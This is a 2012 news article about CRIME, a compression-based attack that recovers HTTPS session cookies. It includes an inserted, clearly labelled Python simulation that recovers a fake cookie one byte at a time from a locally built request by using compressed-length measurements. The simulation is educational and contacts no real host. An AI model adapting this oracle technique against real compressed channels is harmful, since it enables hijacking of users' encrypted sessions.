Compression flaw may allow for HTTPS hijacking on some browsers

By on September 13, 2012, 4:00 PM

Security researchers have demonstrated a flaw in SSL/TLS-level compression that lets an attacker recover a victim's session cookie and hijack an HTTPS-encrypted web session. HTTPS, or HTTP Secure, is the protocol online stores, banks and other websites use to encrypt sensitive data in transit across the net.

The attack, dubbed CRIME (Compression Ratio Info-leak Made Easy), turns the data compression applied to the encrypted stream against the stream itself. Check out this article at Ars Technica for a thorough explanation of what the researchers discovered.

Compression is essentially pattern matching: the algorithm finds strings that repeat within the input and replaces later copies with short references to earlier ones, so the output size depends on how much the data repeats itself. An attacker who can inject chosen plaintext into the victim's requests (for example a URL that the browser fetches with its own cookie header attached) and observe the encrypted traffic can watch how the compressed size changes with each guess; the compression schemes that matter here are DEFLATE as used by TLS and by SPDY. A guess that repeats part of the secret compresses slightly better than one that does not, so the researchers were able to recover the secret cookie one byte at a time without breaking the cipher at all.

For the attack to work, though, the user's browser must negotiate a secure connection with TLS-level compression (DEFLATE) or SPDY (a protocol developed by Google), and the attacker must be able both to observe the victim's encrypted traffic and to make the browser send requests the attacker partly controls. Most modern browsers support at least one of these technologies, but Internet Explorer users will be glad to hear they are safe -- Microsoft's browser has never supported either. Somewhat ironically, this is an example of less being more.
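The byte-at-a-time recovery described above, as an added, self-contained simulation that is not part of the original article or of the researchers' own tool. A constructed request to the hypothetical host bank.example carries a secret cookie, the attacker controls only the URL path, and the only thing the attacker observes is the DEFLATE'd size of each request (a stream cipher or AEAD adds a constant number of bytes, so the encryption step is left out). Because zlib reports sizes in whole bytes, the script sums the sizes over eight padding lengths of 9-bit filler literals to obtain a bit-exact measurement; that trick is this example's own and stands in for the request-padding technique the real attack used. The cookie name `sessionid=`, the value's length and the hex alphabet are assumed known to the attacker.

```python
import zlib

# --- Constructed victim side (assumed data, not from the article) --------------
SECRET = "9c2b7f4a"            # cookie value the attacker wants; attacker code never reads it
COOKIE_NAME = "sessionid="     # cookie name is assumed known
Z_FIXED = getattr(zlib, "Z_FIXED", 4)  # fixed Huffman tables: every ASCII literal costs 8 bits


def victim_request(attacker_path: bytes) -> bytes:
    """The browser assembles this request. The attacker controls only the path
    (e.g. via an <img src> on a page they host); the browser adds the cookie itself."""
    return (b"GET /search?q=" + attacker_path + b" HTTP/1.1\r\n"
            + b"Host: bank.example\r\n"
            + b"Cookie: " + COOKIE_NAME.encode() + SECRET.encode() + b"\r\n\r\n")


def wire_length(plaintext: bytes) -> int:
    """What a network observer sees: the size of the DEFLATE'd request. Encryption
    adds a constant, so the compressed length survives the cipher unchanged."""
    z = zlib.compressobj(9, zlib.DEFLATED, -15, 9, Z_FIXED)
    return len(z.compress(plaintext) + z.flush())


def oracle(attacker_path: bytes) -> int:
    """The attacker's only view of the secret: one request, one observed length."""
    return wire_length(victim_request(attacker_path))


# --- Attacker side -------------------------------------------------------------
ALPHABET = "0123456789abcdef"
# Eight distinct bytes >= 0x90: under fixed Huffman each is a 9-bit literal and none
# can form an LZ77 match, so appending n of them shifts the output by exactly 9n bits.
FILLER = bytes(range(0x90, 0x98))


def bit_cost(guess: bytes) -> int:
    """Bit-exact length (up to a constant) from a byte-granular oracle: the sum of
    ceil((B + 9n) / 8) over n = 0..7 grows by exactly one for every extra bit in B."""
    return sum(oracle(guess + FILLER[:n]) for n in range(len(FILLER)))


def recover_cookie(value_len: int = 8) -> str:
    """Guess the cookie value one character at a time. A correct guess extends the
    LZ77 match between the path and the Cookie header by one byte, which saves the
    8-bit literal that a wrong guess leaves behind, so it is the cheapest candidate."""
    known = COOKIE_NAME.encode()
    for _ in range(value_len):
        costs = {c: bit_cost(known + c.encode()) for c in ALPHABET}
        ranked = sorted(costs, key=costs.get)
        if costs[ranked[0]] == costs[ranked[1]]:
            # The oracle must single out one candidate; a tie means the layout
            # produced an accidental match and the attacker needs different padding.
            raise RuntimeError("ambiguous oracle after %r" % known)
        known += ranked[0].encode()
    return known[len(COOKIE_NAME):].decode()


if __name__ == "__main__":
    queries = value_len = 8
    print("recovered cookie value:", recover_cookie(value_len))
    print("oracle queries used:", value_len * len(ALPHABET) * len(FILLER))
```

Each recovered character costs 16 candidates times 8 paddings, or 128 observed requests, so the whole eight-character value falls in about a thousand requests; a real browser can be driven to issue that many in seconds, which is why the only effective fix was to stop compressing the secret together with attacker-controlled data.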

Recent releases of Firefox and Chrome have been patched, but it is not known whether Opera, Safari or other browsers remain susceptible. Mobile browsers are a particular concern: the researchers believe it is very likely that smartphone browsers remain vulnerable.


User Comments: 1

PinothyJ said:

Why are all the smart people crooks?
